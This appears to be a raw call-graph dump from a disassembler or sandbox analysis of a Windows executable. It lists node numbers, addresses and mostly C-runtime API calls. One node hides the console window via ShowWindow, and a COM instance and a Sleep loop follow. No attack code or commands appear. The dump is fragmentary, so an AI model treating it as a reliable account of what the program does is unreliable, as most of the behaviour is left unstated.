16194->16220 16196 1bb724 16195->16196 16197 1bb767 GetStdHandle 16196->16197 16198 1bb7c9 16196->16198 16199 1bb77a GetFileType 16196->16199 16197->16196 16198->16179 16199->16196 16200->16186 16202 1c2b37 ___BuildCatchObject 16201->16202 16203 1c2b40 16202->16203 16204 1c2b61 16202->16204 16231 1b6094 16203->16231 16223 1b6866 EnterCriticalSection 16204->16223 16209 1c2b99 16237 1c2bc0 16209->16237 16210 1bb7ef 16210->16194 16214 1bb667 GetStartupInfoW 16210->16214 16211 1c2b6d 16211->16209 16224 1c2a7b 16211->16224 16215 1bb718 16214->16215 16216 1bb684 16214->16216 16215->16193 16216->16215 16217 1c2b2b 40 API calls 16216->16217 16218 1bb6ac 16217->16218 16218->16215 16219 1bb6dc GetFileType 16218->16219 16219->16218 16430 1b68ae LeaveCriticalSection 16220->16430 16222 1bb80f 16222->16179 16223->16211 16240 1b6c2b 16224->16240 16226 1c2a8d 16230 1c2a9a 16226->16230 16247 1bcf76 16226->16247 16252 1b7805 16230->16252 16285 1bb4cd GetLastError 16231->16285 16233 1b6099 16234 1b5b05 16233->16234 16349 1b5a51 16234->16349 16429 1b68ae LeaveCriticalSection 16237->16429 16239 1c2bc7 16239->16210 16245 1b6c38 __Getctype 16240->16245 16241 1b6c78 16244 1b6094 __dosmaperr 13 API calls 16241->16244 16242 1b6c63 RtlAllocateHeap 16243 1b6c76 16242->16243 16242->16245 16243->16226 16244->16243 16245->16241 16245->16242 16258 1b7d4d 16245->16258 16271 1bcc67 16247->16271 16249 1bcf92 16250 1bcf9b 16249->16250 16251 1bcfb0 InitializeCriticalSectionAndSpinCount 16249->16251 16250->16226 16251->16250 16253 1b7810 HeapFree 16252->16253 16257 1b783a 16252->16257 16254 1b7825 GetLastError 16253->16254 16253->16257 16255 1b7832 __dosmaperr 16254->16255 16256 1b6094 __dosmaperr 12 API calls 16255->16256 16256->16257 16257->16211 16261 1b7d79 16258->16261 16262 1b7d85 ___BuildCatchObject 16261->16262 16267 1b6866 EnterCriticalSection 16262->16267 16264 1b7d90 _Atexit 16268 1b7dc7 16264->16268 16267->16264 16269 1b68ae std::_Lockit::~_Lockit LeaveCriticalSection 16268->16269 16270 1b7d58 16269->16270 16270->16245 16272 1bcc97 16271->16272 16276 1bcc93 __crt_fast_encode_pointer 16271->16276 16272->16276 16277 1bcb9c 16272->16277 16275 1bccb1 GetProcAddress 16275->16276 16276->16249 16283 1bcbad std::_Lockit::_Lockit 16277->16283 16278 1bcc43 16278->16275 16278->16276 16279 1bcbcb LoadLibraryExW 16280 1bcc4a 16279->16280 16281 1bcbe6 GetLastError 16279->16281 16280->16278 16282 1bcc5c FreeLibrary 16280->16282 16281->16283 16282->16278 16283->16278 16283->16279 16284 1bcc19 LoadLibraryExW 16283->16284 16284->16280 16284->16283 16286 1bb4e3 16285->16286 16289 1bb4e9 16285->16289 16308 1bce7a 16286->16308 16305 1bb4ed SetLastError 16289->16305 16313 1bceb9 16289->16313 16292 1b6c2b __Getctype 12 API calls 16293 1bb51a 16292->16293 16294 1bb533 16293->16294 16295 1bb522 16293->16295 16297 1bceb9 __dosmaperr 6 API calls 16294->16297 16296 1bceb9 __dosmaperr 6 API calls 16295->16296 16298 1bb530 16296->16298 16299 1bb53f 16297->16299 16303 1b7805 ___vcrt_freefls@4 12 API calls 16298->16303 16300 1bb55a 16299->16300 16301 1bb543 16299->16301 16318 1bb1aa 16300->16318 16302 1bceb9 __dosmaperr 6 API calls 16301->16302 16302->16298 16303->16305 16305->16233 16307 1b7805 ___vcrt_freefls@4 12 API calls 16307->16305 16309 1bcc67 std::_Lockit::_Lockit 5 API calls 16308->16309 16310 1bce96 16309->16310 16311 1bce9f 16310->16311 16312 1bceb1 TlsGetValue 16310->16312 16311->16289 16314 1bcc67 std::_Lockit::_Lockit 5 API calls 16313->16314 16315 1bced5 16314->16315 16316 1bb505 16315->16316 16317 1bcef3 TlsSetValue 16315->16317 16316->16292 16316->16305 16323 1bb03e 16318->16323 16324 1bb04a ___BuildCatchObject 16323->16324 16337 1b6866 EnterCriticalSection 16324->16337 16326 1bb054 16338 1bb084 16326->16338 16329 1bb150 16330 1bb15c ___BuildCatchObject 16329->16330 16341 1b6866 EnterCriticalSection 16330->16341 16332 1bb166 16342 1bb331 16332->16342 16334 1bb17e 16346 1bb19e 16334->16346 16337->16326 16339 1b68ae std::_Lockit::~_Lockit LeaveCriticalSection 16338->16339 16340 1bb072 16339->16340 16340->16329 16341->16332 16343 1bb367 __Getctype 16342->16343 16344 1bb340 __Getctype 16342->16344 16343->16334 16344->16343 16345 1c3bfb __Getctype 14 API calls 16344->16345 16345->16343 16347 1b68ae std::_Lockit::~_Lockit LeaveCriticalSection 16346->16347 16348 1bb18c 16347->16348 16348->16307 16350 1b5a63 ___std_exception_copy 16349->16350 16355 1b5a88 16350->16355 16352 1b5a7b 16366 1b509f 16352->16366 16356 1b5a98 16355->16356 16357 1b5a9f 16355->16357 16372 1b520f GetLastError 16356->16372 16363 1b5aad 16357->16363 16376 1b58e0 16357->16376 16360 1b5ad4 16360->16363 16379 1b5b32 IsProcessorFeaturePresent 16360->16379 16362 1b5b04 16364 1b5a51 ___std_exception_copy 39 API calls 16362->16364 16363->16352 16365 1b5b11 16364->16365 16365->16352 16367 1b50ab 16366->16367 16370 1b50c2 16367->16370 16411 1b5255 16367->16411 16369 1b5255 ___std_exception_copy 39 API calls 16371 1b50d5 16369->16371 16370->16369 16370->16371 16371->16210 16373 1b5228 16372->16373 16383 1bb57e 16373->16383 16377 1b58eb GetLastError SetLastError 16376->16377 16378 1b5904 16376->16378 16377->16360 16378->16360 16380 1b5b3e 16379->16380 16405 1b5909 16380->16405 16384 1bb591 16383->16384 16387 1bb597 16383->16387 16386 1bce7a __dosmaperr 6 API calls 16384->16386 16385 1bceb9 __dosmaperr 6 API calls 16388 1bb5b1 16385->16388 16386->16387 16387->16385 16404 1b5240 SetLastError 16387->16404 16389 1b6c2b __Getctype 14 API calls 16388->16389 16388->16404 16390 1bb5c1 16389->16390 16391 1bb5c9 16390->16391 16392 1bb5de 16390->16392 16394 1bceb9 __dosmaperr 6 API calls 16391->16394 16393 1bceb9 __dosmaperr 6 API calls 16392->16393 16395 1bb5ea 16393->16395 16396 1bb5d5 16394->16396 16397 1bb5ee 16395->16397 16398 1bb5fd 16395->16398 16401 1b7805 ___vcrt_freefls@4 14 API calls 16396->16401 16399 1bceb9 __dosmaperr 6 API calls 16397->16399 16400 1bb1aa __dosmaperr 14 API calls 16398->16400 16399->16396 16402 1bb608 16400->16402 16401->16404 16403 1b7805 ___vcrt_freefls@4 14 API calls 16402->16403 16403->16404 16404->16357 16406 1b5925 _Atexit ___scrt_fastfail 16405->16406 16407 1b5951 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16406->16407 16410 1b5a22 _Atexit 16407->16410 16408 1b06b2 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 16409 1b5a40 GetCurrentProcess TerminateProcess 16408->16409 16409->16362 16410->16408 16412 1b5268 16411->16412 16413 1b525f 16411->16413 16412->16370 16414 1b520f ___std_exception_copy 16 API calls 16413->16414 16415 1b5264 16414->16415 16415->16412 16418 1b72ec 16415->16418 16419 1beebe _Atexit EnterCriticalSection LeaveCriticalSection 16418->16419 16420 1b72f1 16419->16420 16421 1b72fc 16420->16421 16422 1bef03 _Atexit 38 API calls 16420->16422 16423 1b7306 IsProcessorFeaturePresent 16421->16423 16428 1b7325 16421->16428 16422->16421 16424 1b7312 16423->16424 16427 1b5909 _Atexit 8 API calls 16424->16427 16425 1b821d _Atexit 21 API calls 16426 1b732f 16425->16426 16427->16428 16428->16425 16429->16239 16430->16222 16432 1b4985 16431->16432 16433 1b495f 16431->16433 16432->16117 16433->16432 16434 1b496f FreeLibrary 16433->16434 16434->16433 16436 1b8583 16435->16436 16440 1b8599 16435->16440 16436->16440 16441 1b85a6 16436->16441 16438 1b8590 16438->16440 16458 1b8711 16438->16458 16440->16032 16442 1b85af 16441->16442 16443 1b85b2 16441->16443 16442->16438 16466 1c20eb 16443->16466 16448 1b85cf 16493 1b8600 16448->16493 16449 1b85c3 16450 1b7805 ___vcrt_freefls@4 14 API calls 16449->16450 16452 1b85c9 16450->16452 16452->16438 16454 1b7805 ___vcrt_freefls@4 14 API calls 16455 1b85f3 16454->16455 16456 1b7805 ___vcrt_freefls@4 14 API calls 16455->16456 16457 1b85f9 16456->16457 16457->16438 16459 1b8782 16458->16459 16464 1b8720 16458->16464 16459->16440 16460 1c11a1 WideCharToMultiByte std::_Locinfo::_Locinfo_dtor 16460->16464 16461 1b6c2b __Getctype 14 API calls 16461->16464 16462 1b8786 16463 1b7805 ___vcrt_freefls@4 14 API calls 16462->16463 16463->16459 16464->16459 16464->16460 16464->16461 16464->16462 16465 1b7805 ___vcrt_freefls@4 14 API calls 16464->16465 16465->16464 16467 1c20f4 16466->16467 16468 1b85b8 16466->16468 16515 1bb437 16467->16515 16472 1c2403 GetEnvironmentStringsW 16468->16472 16473 1c241b 16472->16473 16486 1b85bd 16472->16486 16474 1c11a1 std::_Locinfo::_Locinfo_dtor WideCharToMultiByte 16473->16474 16475 1c2438 16474->16475 16476 1c244d 16475->16476 16477 1c2442 FreeEnvironmentStringsW 16475->16477 16478 1b7330 ___crtLCMapStringA 15 API calls 16476->16478 16477->16486 16479 1c2454 16478->16479 16480 1c245c 16479->16480 16481 1c246d 16479->16481 16482 1b7805 ___vcrt_freefls@4 14 API calls 16480->16482 16483 1c11a1 std::_Locinfo::_Locinfo_dtor WideCharToMultiByte 16481->16483 16484 1c2461 FreeEnvironmentStringsW 16482->16484 16485 1c247d 16483->16485 16484->16486 16487 1c248c 16485->16487 16488 1c2484 16485->16488 16486->16448 16486->16449 16490 1b7805 ___vcrt_freefls@4 14 API calls 16487->16490 16489 1b7805 ___vcrt_freefls@4 14 API calls 16488->16489 16491 1c248a FreeEnvironmentStringsW 16489->16491 16490->16491 16491->16486 16494 1b8615 16493->16494 16495 1b6c2b __Getctype 14 API calls 16494->16495 16496 1b863c 16495->16496 16497 1b8644 16496->16497 16506 1b864e 16496->16506 16498 1b7805 ___vcrt_freefls@4 14 API calls 16497->16498 16514 1b85d6 16498->16514 16499 1b86ab 16500 1b7805 ___vcrt_freefls@4 14 API calls 16499->16500 16500->16514 16501 1b6c2b __Getctype 14 API calls 16501->16506 16502 1b86ba 16801 1b86e2 16502->16801 16506->16499 16506->16501 16506->16502 16508 1b86d5 16506->16508 16510 1b7805 ___vcrt_freefls@4 14 API calls 16506->16510 16792 1ba718 16506->16792 16507 1b7805 ___vcrt_freefls@4 14 API calls 16509 1b86c7 16507->16509 16511 1b5b32 __Getctype 11 API calls 16508->16511 16512 1b7805 ___vcrt_freefls@4 14 API calls 16509->16512 16510->16506 16513 1b86e1 16511->16513 16512->16514 16514->16454 16516 1bb448 16515->16516 16517 1bb442 16515->16517 16518 1bceb9 __dosmaperr 6 API calls 16516->16518 16537 1bb44e 16516->16537 16519 1bce7a __dosmaperr 6 API calls 16517->16519 16520 1bb462 16518->16520 16519->16516 16521 1b6c2b __Getctype 14 API calls 16520->16521 16520->16537 16523 1bb472 16521->16523 16522 1b72ec __purecall 39 API calls 16524 1bb4cc 16522->16524 16525 1bb47a 16523->16525 16526 1bb48f 16523->16526 16528 1bceb9 __dosmaperr 6 API calls 16525->16528 16527 1bceb9 __dosmaperr 6 API calls 16526->16527 16529 1bb49b 16527->16529 16535 1bb486 16528->16535 16530 1bb49f 16529->16530 16531 1bb4ae 16529->16531 16532 1bceb9 __dosmaperr 6 API calls 16530->16532 16533 1bb1aa __dosmaperr 14 API calls 16531->16533 16532->16535 16536 1bb4b9 16533->16536 16534 1b7805 ___vcrt_freefls@4 14 API calls 16534->16537 16535->16534 16538 1b7805 ___vcrt_freefls@4 14 API calls 16536->16538 16537->16522 16539 1bb453 16537->16539 16538->16539 16540 1c1ef6 16539->16540 16563 1c204b 16540->16563 16545 1c1f39 16545->16468 16548 1c1f60 16588 1c2146 16548->16588 16549 1c1f52 16550 1b7805 ___vcrt_freefls@4 14 API calls 16549->16550 16550->16545 16553 1c1f98 16555 1b6094 __dosmaperr 14 API calls 16553->16555 16554 1c1fb3 16558 1c1fdf 16554->16558 16561 1b7805 ___vcrt_freefls@4 14 API calls 16554->16561 16556 1c1f9d 16555->16556 16557 1b7805 ___vcrt_freefls@4 14 API calls 16556->16557 16557->16545 16559 1c2028 16558->16559 16599 1c1b6f 16558->16599 16560 1b7805 ___vcrt_freefls@4 14 API calls 16559->16560 16560->16545 16561->16558 16564 1c2057 ___BuildCatchObject 16563->16564 16566 1c2071 16564->16566 16607 1b6866 EnterCriticalSection 16564->16607 16567 1c1f20 16566->16567 16569 1b72ec __purecall 39 API calls 16566->16569 16574 1c1c7d 16567->16574 16568 1c20ad 16608 1c20ca 16568->16608 16571 1c20ea 16569->16571 16572 1c2081 16572->16568 16573 1b7805 ___vcrt_freefls@4 14 API calls 16572->16573 16573->16568 16612 1b73e7 16574->16612 16577 1c1c9e GetOEMCP 16579 1c1cc7 16577->16579 16578 1c1cb0 16578->16579 16580 1c1cb5 GetACP 16578->16580 16579->16545 16581 1b7330 16579->16581 16580->16579 16582 1b736e 16581->16582 16586 1b733e __Getctype 16581->16586 16583 1b6094 __dosmaperr 14 API calls 16582->16583 16585 1b736c 16583->16585 16584 1b7359 RtlAllocateHeap 16584->16585 16584->16586 16585->16548 16585->16549 16586->16582 16586->16584 16587 1b7d4d new 2 API calls 16586->16587 16587->16586 16589 1c1c7d 41 API calls 16588->16589 16590 1c2166 16589->16590 16592 1c21a3 IsValidCodePage 16590->16592 16597 1c226b 16590->16597 16598 1c21be ___scrt_fastfail 16590->16598 16593 1c21b5 16592->16593 16592->16597 16595 1c21de GetCPInfo 16593->16595 16593->16598 16594 1c1f8d 16594->16553 16594->16554 16595->16597 16595->16598 16692 1b06b2 16597->16692 16681 1c1d51 16598->16681 16600 1c1b7b ___BuildCatchObject 16599->16600 16766 1b6866 EnterCriticalSection 16600->16766 16602 1c1b85 16767 1c1bbc 16602->16767 16607->16572 16611 1b68ae LeaveCriticalSection 16608->16611 16610 1c20d1 16610->16566 16611->16610 16613 1b7405 16612->16613 16614 1b73fe 16612->16614 16613->16614 16620 1bb37c GetLastError 16613->16620 16614->16577 16614->16578 16621 1bb392 16620->16621 16624 1bb398 16620->16624 16622 1bce7a __dosmaperr 6 API calls 16621->16622 16622->16624 16623 1bceb9 __dosmaperr 6 API calls 16625 1bb3b4 16623->16625 16624->16623 16626 1bb39c SetLastError 16624->16626 16625->16626 16628 1b6c2b __Getctype 14 API calls 16625->16628 16629 1b7426 16626->16629 16630 1bb431 16626->16630 16631 1bb3c9 16628->16631 16647 1be69d 16629->16647 16632 1b72ec __purecall 37 API calls 16630->16632 16633 1bb3e2 16631->16633 16634 1bb3d1 16631->16634 16637 1bb436 16632->16637 16636 1bceb9 __dosmaperr 6 API calls 16633->16636 16635 1bceb9 __dosmaperr 6 API calls 16634->16635 16638 1bb3df 16635->16638 16639 1bb3ee 16636->16639 16643 1b7805 ___vcrt_freefls@4 14 API calls 16638->16643 16640 1bb409 16639->16640 16641 1bb3f2 16639->16641 16644 1bb1aa __dosmaperr 14 API calls 16640->16644 16642 1bceb9 __dosmaperr 6 API calls 16641->16642 16642->16638 16643->16626 16645 1bb414 16644->16645 16646 1b7805 ___vcrt_freefls@4 14 API calls 16645->16646 16646->16626 16648 1be6b0 16647->16648 16650 1b743c 16647->16650 16648->16650 16655 1c3e47 16648->16655 16651 1be6fb 16650->16651 16652 1be70e 16651->16652 16653 1be723 16651->16653 16652->16653 16676 1c2133 16652->16676 16653->16614 16656 1c3e53 ___BuildCatchObject 16655->16656 16657 1bb37c __Getctype 39 API calls 16656->16657 16658 1c3e5c 16657->16658 16665 1c3ea2 16658->16665 16668 1b6866 EnterCriticalSection 16658->16668 16660 1c3e7a 16669 1c3ec8 16660->16669 16665->16650 16666 1b72ec __purecall 39 API calls 16667 1c3ec7 16666->16667 16668->16660 16670 1c3e8b 16669->16670 16671 1c3ed6 __Getctype 16669->16671 16673 1c3ea7 16670->16673 16671->16670 16672 1c3bfb __Getctype 14 API calls 16671->16672 16672->16670 16674 1b68ae std::_Lockit::~_Lockit LeaveCriticalSection 16673->16674 16675 1c3e9e 16674->16675 16675->16665 16675->16666 16677 1bb37c __Getctype 39 API calls 16676->16677 16678 1c2138 16677->16678 16679 1c204b __Toupper 39 API calls 16678->16679 16680 1c2143 16679->16680 16680->16653 16682 1c1d79 GetCPInfo 16681->16682 16683 1c1e42 16681->16683 16682->16683 16688 1c1d91 16682->16688 16685 1b06b2 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 16683->16685 16687 1c1ef4 16685->16687 16687->16597 16699 1beab3 16688->16699 16691 1beda3 43 API calls 16691->16683 16693 1b06bb 16692->16693 16694 1b06bd IsProcessorFeaturePresent 16692->16694 16693->16594 16696 1b0dd7 16694->16696 16765 1b0d9b SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 16696->16765 16698 1b0eba 16698->16594 16700 1b73e7 __Toupper 39 API calls 16699->16700 16701 1bead3 16700->16701 16719 1c10e7 16701->16719 16703 1beb87 16722 1afa29 16703->16722 16704 1beb00 16704->16703 16707 1b7330 ___crtLCMapStringA 15 API calls 16704->16707 16709 1beb8f 16704->16709 16710 1beb25 __alloca_probe_16 ___scrt_fastfail 16704->16710 16705 1b06b2 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 16708 1bebb2 16705->16708 16707->16710 16714 1beda3 16708->16714 16709->16705 16710->16703 16711 1c10e7 __Toupper MultiByteToWideChar 16710->16711 16712 1beb6e 16711->16712 16712->16703 16713 1beb75 GetStringTypeW 16712->16713 16713->16703 16715 1b73e7 __Toupper 39 API calls 16714->16715 16716 1bedb6 16715->16716 16728 1bebb4 16716->16728 16726 1c104f 16719->16726 16723 1afa33 16722->16723 16724 1afa44 16722->16724 16723->16724 16725 1b7805 ___vcrt_freefls@4 14 API calls 16723->16725 16724->16709 16725->16724 16727 1c1060 MultiByteToWideChar 16726->16727 16727->16704 16729 1bebcf ___crtLCMapStringA 16728->16729 16730 1c10e7 __Toupper MultiByteToWideChar 16729->16730 16734 1bec13 16730->16734 16731 1bed8e 16732 1b06b2 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 16731->16732 16733 1beda1 16732->16733 16733->16691 16734->16731 16735 1b7330 ___crtLCMapStringA 15 API calls 16734->16735 16737 1bec39 __alloca_probe_16 16734->16737 16748 1bece1 16734->16748 16735->16737 16736 1afa29 __freea 14 API calls 16736->16731 16738 1c10e7 __Toupper MultiByteToWideChar 16737->16738 16737->16748 16739 1bec82 16738->16739 16739->16748 16756 1bd038 16739->16756 16742 1becb8 16747 1bd038 std::_Locinfo::_Locinfo_dtor 6 API calls 16742->16747 16742->16748 16743 1becf0 16744 1bed79 16743->16744 16745 1b7330 ___crtLCMapStringA 15 API calls 16743->16745 16749 1bed02 __alloca_probe_16 16743->16749 16746 1afa29 __freea 14 API calls 16744->16746 16745->16749 16746->16748 16747->16748 16748->16736 16749->16744 16750 1bd038 std::_Locinfo::_Locinfo_dtor 6 API calls 16749->16750 16751 1bed45 16750->16751 16751->16744 16762 1c11a1 16751->16762 16753 1bed5f 16753->16744 16754 1bed68 16753->16754 16755 1afa29 __freea 14 API calls 16754->16755 16755->16748 16757 1bcb68 std::_Lockit::_Lockit 5 API calls 16756->16757 16758 1bd043 16757->16758 16759 1bd095 std::_Locinfo::_Locinfo_dtor 5 API calls 16758->16759 16761 1bd049 16758->16761 16760 1bd089 LCMapStringW 16759->16760 16760->16761 16761->16742 16761->16743 16761->16748 16763 1c11b4 std::_Locinfo::_Locinfo_dtor 16762->16763 16764 1c11f2 WideCharToMultiByte 16763->16764 16764->16753 16765->16698 16766->16602 16777 1c234b 16767->16777 16769 1c1bde 16770 1c234b 39 API calls 16769->16770 16771 1c1bfd 16770->16771 16772 1c1b92 16771->16772 16773 1b7805 ___vcrt_freefls@4 14 API calls 16771->16773 16774 1c1bb0 16772->16774 16773->16772 16791 1b68ae LeaveCriticalSection 16774->16791 16776 1c1b9e 16776->16559 16778 1c235c 16777->16778 16782 1c2358 ctype 16777->16782 16779 1c2363 16778->16779 16784 1c2376 ___scrt_fastfail 16778->16784 16780 1b6094 __dosmaperr 14 API calls 16779->16780 16781 1c2368 16780->16781 16783 1b5b05 ___std_exception_copy 39 API calls 16781->16783 16782->16769 16783->16782 16784->16782 16785 1c23a4 16784->16785 16787 1c23ad 16784->16787 16786 1b6094 __dosmaperr 14 API calls 16785->16786 16788 1c23a9 16786->16788 16787->16782 16789 1b6094 __dosmaperr 14 API calls 16787->16789 16790 1b5b05 ___std_exception_copy 39 API calls 16788->16790 16789->16788 16790->16782 16791->16776 16793 1ba726 16792->16793 16795 1ba734 16792->16795 16793->16795 16799 1ba74c 16793->16799 16794 1b6094 __dosmaperr 14 API calls 16796 1ba73c 16794->16796 16795->16794 16798 1b5b05 ___std_exception_copy 39 API calls 16796->16798 16797 1ba746 16797->16506 16798->16797 16799->16797 16800 1b6094 __dosmaperr 14 API calls 16799->16800 16800->16796 16805 1b86ef 16801->16805 16806 1b86c0 16801->16806 16802 1b8706 16804 1b7805 ___vcrt_freefls@4 14 API calls 16802->16804 16803 1b7805 ___vcrt_freefls@4 14 API calls 16803->16805 16804->16806 16805->16802 16805->16803 16806->16507 16808 1a2022 LoadLibraryA GetProcAddress GetConsoleWindow ShowWindow 16807->16808 16809 1b681a 16808->16809 16814 1b7330 __Getctype 16809->16814 16810 1b736e 16811 1b6094 __dosmaperr 14 API calls 16810->16811 16813 1b736c 16811->16813 16812 1b7359 RtlAllocateHeap 16812->16813 16812->16814 16813->16038 16814->16810 16814->16812 16815 1b7d4d new 2 API calls 16814->16815 16815->16814 16817 1a2003 EnumSystemCodePagesW 16816->16817 16818 1abdfc 16817->16818 16819 1abe18 16818->16819 16924 1aceab 16819->16924 16821 1abcf0 16821->16044 16823 1a19a5 16822->16823 17048 1adf45 16823->17048 16830 1a1a10 16831 1adf45 41 API calls 16830->16831 16832 1a1a2e SysAllocString 16831->16832 16834 1acb55 39 API calls 16832->16834 16835 1a1a4b CoUninitialize 16834->16835 16835->16049 16839 1ae13f 16837->16839 16838 1ae159 17085 1ad0bd 16838->17085 16839->16838 16842 1ad628 41 API calls 16839->16842 16841 1ae17c 17094 1ad01a 16841->17094 16842->16838 16844 1abd37 16845 1a1c5a 16844->16845 17105 1abf6d 16845->17105 16852 1a1ce1 17130 1add72 16852->17130 16855 1a1e19 16856 1acba9 39 API calls 16855->16856 16857 1a1e25 16856->16857 17140 1abf2a 16857->17140 16859 1a1e31 std::ios_base::_Ios_base_dtor 16859->16053 16860 1a1ceb 16860->16855 16862 1acf24 41 API calls 16860->16862 16863 1acba9 39 API calls 16860->16863 17134 1ae553 16860->17134 16862->16860 16863->16860 16865 1acba9 39 API calls 16864->16865 16866 1abd4f 16865->16866 16866->16056 16868 1abf6d 108 API calls 16867->16868 16869 1a1e76 16868->16869 16870 1ae4d9 41 API calls 16869->16870 16871 1a1eb8 16870->16871 16872 1ad409 72 API calls 16871->16872 16873 1a1ec1 16872->16873 16874 1ad51f 49 API calls 16873->16874 16886 1a1eda 16873->16886 16874->16886 16875 1a1f52 17994 1abe94 16875->17994 16880 1ad409 72 API calls 16881 1a1f7e 16880->16881 16882 1a1f9d 16881->16882 16884 1ad51f 49 API calls 16881->16884 18011 1abe51 16882->18011 16884->16882 16885 1a1fa9 std::ios_base::_Ios_base_dtor 16888 1acba9 39 API calls 16885->16888 16886->16875 17981 1acc94 16886->17981 16889 1a1fd0 16888->16889 16890 1abf2a 72 API calls 16889->16890 16891 1a1fdc std::ios_base::_Ios_base_dtor 16890->16891 16891->16059 16893 1abe94 108 API calls 16892->16893 16894 1a1ac7 16893->16894 16895 1ad409 72 API calls 16894->16895 16896 1a1ad1 16895->16896 16897 1a1ae4 16896->16897 16898 1ad51f 49 API calls 16896->16898 16899 1abe51 72 API calls 16897->16899 16898->16897 16900 1a1af0 std::ios_base::_Ios_base_dtor 16899->16900 16901 1a1b08 CoCreateInstance VariantInit 16900->16901 16902 1a1b3b 16901->16902 16903 1adf45 41 API calls 16902->16903 16904 1a1b5a SysAllocString 16903->16904 16906 1acb55 39 API calls 16904->16906 16907 1a1b79 VariantInit 16906->16907 16909 1a1bae 16907->16909 16910 1adf45 41 API calls 16909->16910 16911 1a1bcd SysAllocString 16910->16911 16913 1acb55 39 API calls 16911->16913 16914 1a1bec 16913->16914 16915 1a1c1e Sleep 16914->16915 16916 1a1c2d CoUninitialize 16914->16916 16915->16914 16916->16063 16919 1abdc5 16918->16919 18045 1ade6b 16919->18045 16922 1a11f8 39 API calls 16923 1abd9a 16922->16923 16923->16066 16925 1acebb 16924->16925 16926 1acedb 16925->16926 16927 1acebf 16925->16927 16941 1ad628 16926->16941 16931 1acf24 16927->16931 16930 1aced9 ctype 16930->16821 16951 1ad5d3 16931->16951 16933 1acf3a 16934 1acf68 16933->16934 16935 1acf4e 16933->16935 16937 1ad628 41 API calls 16934->16937 16956 1ada53 16935->16956 16939 1acf66 ctype 16937->16939 16939->16930 16942 1ad67d 16941->16942 16943 1ad634 16941->16943 16997 1af307 16942->16997 16945 1ad639 16943->16945 16949 1ad644 16943->16949 16987 1adc28 16945->16987 16948 1ad642 16948->16930 16949->16948 16993 1acba9 16949->16993 16952 1ad5de 16951->16952 16953 1ad5e2 16951->16953 16952->16933 16962 1af327 16953->16962 16957 1ad5d3 41 API calls 16956->16957 16958 1acf59 16957->16958 16959 1acde4 16958->16959 16960 1ad5d3 41 API calls 16959->16960 16961 1acdf5 ___BuildCatchObject 16960->16961 16961->16939 16967 1af2c9 16962->16967 16966 1af346 16973 1a10a2 16967->16973 16970 1b2d76 16971 1b2d96 16970->16971 16972 1b2dc8 RaiseException 16971->16972 16972->16966 16976 1b0fcd 16973->16976 16977 1b0fda 16976->16977 16983 1a10ce 16976->16983 16978 1b681a ___std_exception_copy 15 API calls 16977->16978 16977->16983 16979 1b0ff7 16978->16979 16980 1ba718 ___std_exception_copy 39 API calls 16979->16980 16982 1b1007 16979->16982 16980->16982 16984 1b6300 16982->16984 16983->16970 16985 1b7805 ___vcrt_freefls@4 14 API calls 16984->16985 16986 1b6318 16985->16986 16986->16983 16988 1adc32 __EH_prolog 16987->16988 17002 1a11a9 16988->17002 16990 1acba9 39 API calls 16991 1adcf4 16990->16991 16991->16948 16992 1adc8a ctype 16992->16990 16994 1acbb9 ctype 16993->16994 16996 1acbde 16993->16996 16994->16996 17033 1a11f8 16994->17033 16996->16948 17045 1af272 16997->17045 17000 1b2d76 __CxxThrowException@8 RaiseException 17001 1af326 17000->17001 17003 1a11b4 17002->17003 17012 1a11b0 17002->17012 17004 1a11f2 17003->17004 17006 1a11ca 17003->17006 17007 1a11e3 17003->17007 17025 1af2ea 17004->17025 17006->17004 17008 1a11d1 17006->17008 17009 1b01ab new 16 API calls 17007->17009 17018 1b01ab 17008->17018 17009->17012 17012->16992 17021 1b01b0 17018->17021 17019 1b681a ___std_exception_copy 15 API calls 17019->17021 17020 1b01dc 17020->17012 17021->17019 17021->17020 17022 1b7d4d new 2 API calls 17021->17022 17023 1af2ea Concurrency::cancel_current_task RaiseException 17021->17023 17029 1b0a0f 17021->17029 17022->17021 17023->17021 17026 1af2f8 Concurrency::cancel_current_task 17025->17026 17027 1b2d76 __CxxThrowException@8 RaiseException 17026->17027 17028 1af306 17027->17028 17030 1b0a1d Concurrency::cancel_current_task 17029->17030 17031 1b2d76 __CxxThrowException@8 RaiseException 17030->17031 17032 1b0a2b 17031->17032 17034 1a120a 17033->17034 17039 1a122f 17034->17039 17040 1b5b15 17034->17040 17039->16996 17041 1b5a51 ___std_exception_copy 39 API calls 17040->17041 17042 1b5b24 17041->17042 17043 1b5b32 __Getctype 11 API calls 17042->17043 17044 1b5b31 17043->17044 17046 1a10a2 std::exception::exception 40 API calls 17045->17046 17047 1af284 17046->17047 17047->17000 17049 1adf72 17048->17049 17053 1adf7f 17048->17053 17049->17053 17058 1ad56e 17049->17058 17068 1ae6d7 17053->17068 17054 1acb55 17055 1acb65 17054->17055 17057 1a19e0 VariantInit 17054->17057 17056 1a11f8 39 API calls 17055->17056 17055->17057 17056->17057 17057->16830 17059 1ad5c8 17058->17059 17060 1ad57d 17058->17060 17061 1af307 41 API calls 17059->17061 17062 1ad58d 17060->17062 17063 1ad582 17060->17063 17064 1ad5d2 17061->17064 17066 1ad58b 17062->17066 17067 1acb55 39 API calls 17062->17067 17072 1adb18 17063->17072 17066->17053 17067->17066 17069 1ae6e1 __EH_prolog 17068->17069 17070 1a19c3 SysAllocString 17069->17070 17078 1ae477 17069->17078 17070->17054 17073 1adb22 __EH_prolog 17072->17073 17074 1a11a9 41 API calls 17073->17074 17075 1adb7c 17074->17075 17076 1acb55 39 API calls 17075->17076 17077 1adbe2 17076->17077 17077->17066 17079 1ae4ce 17078->17079 17081 1ae48d 17078->17081 17080 1af307 41 API calls 17079->17080 17082 1ae4d8 17080->17082 17083 1ad56e 41 API calls 17081->17083 17084 1ae49e 17081->17084 17083->17084 17084->17069 17086 1ad5d3 41 API calls 17085->17086 17087 1ad0d3 17086->17087 17088 1ad0ee 17087->17088 17089 1ad151 